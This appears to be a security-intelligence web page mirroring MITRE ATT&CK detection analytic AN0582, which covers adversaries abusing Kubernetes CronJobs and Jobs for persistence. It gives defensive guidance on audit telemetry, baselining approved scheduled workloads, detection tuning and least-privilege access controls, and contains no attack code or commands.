AN0582: Analytic 0582
Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.
Analyst context for executives and security teams
AN0582 is a detection analytic for container environments where an adversary abuses orchestration features, such as Kubernetes CronJobs, to run recurring or cluster-wide malicious work. For leaders, the practical issue is that scheduled workload objects can turn a container platform into a persistence mechanism, so resilience depends on knowing who can create those objects, whether those creations are logged, and whether suspicious scheduling activity is reviewed quickly.
Executive priority
Prioritize this where container orchestration platforms support important business services. The decision value is access governance and operational assurance: validate that teams can prove who created or changed CronJobs and Jobs, that unusual scheduled workload creation can be investigated, and that incident responders have enough audit evidence to distinguish legitimate automation from persistence. Because ATT&CK provides no detection logic for this analytic, organizations should treat it as a coverage-validation item rather than an out-of-the-box detection guarantee.
Technical view
For SOC, detection engineering, and IR teams, validate visibility into creation and modification of container orchestration scheduled workload objects, especially CronJobs that launch Jobs across a cluster. Review whether telemetry captures the requesting identity, namespace, object name, schedule, image or command metadata where available, timestamps, and source context. Since no tactics are specified and no official detection text is provided, build local logic around deviations from approved automation patterns and correlate with identity, change-management, and workload inventory context.
Likely telemetry
- Container orchestration audit events for CronJob and Job create, update, and delete actions
- Cluster object inventory or configuration-state changes for scheduled workload resources
- Identity and access records showing the user, service account, or automation creating scheduled jobs
- Namespace and workload metadata associated with the scheduled job
- Change-management or deployment pipeline records for expected scheduled workload creation
Detection direction
- Confirm that container audit logging is enabled and retained for scheduled workload object activity.
- Baseline approved CronJobs and recurring Jobs by namespace, owner, service account, schedule, and deployment source.
- Tune for newly created or modified CronJobs that do not align with known release pipelines or administrative automation.
- Correlate suspicious scheduled workload creation with identity context and recent cluster access activity before escalating.
- Account for false positives from legitimate platform maintenance, backup jobs, CI/CD automation, and application schedulers.
Mitigation priorities
- Restrict who can create or modify CronJobs and Jobs in container orchestration platforms using least-privilege access controls.
- Maintain an approved inventory of scheduled workload objects and owners.
- Require controlled deployment paths or change approval for new recurring cluster jobs.
- Ensure audit logging and retention are sufficient for incident response and compliance evidence.
- Review service account permissions associated with scheduled workloads to limit cluster-wide abuse potential.
Analyst notes and limits
This object is a detection analytic, not a full ATT&CK technique entry. The only supplied platform is Containers, and the description specifically references container orchestration platforms such as Kubernetes and CronJobs. No relationships, tactic mapping, or official detection procedure were supplied, so local engineering must define the exact queries, thresholds, and escalation criteria.
The ATT&CK record provides a short description but no official detection text and no relationship context. This take does not assert active exploitation, actor attribution, business impact, or existing detection coverage. Effective validation requires environment-specific cluster architecture, logging configuration, RBAC model, and approved automation inventory.
Analytic 0582
Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 0875ed8b6324… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0582Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.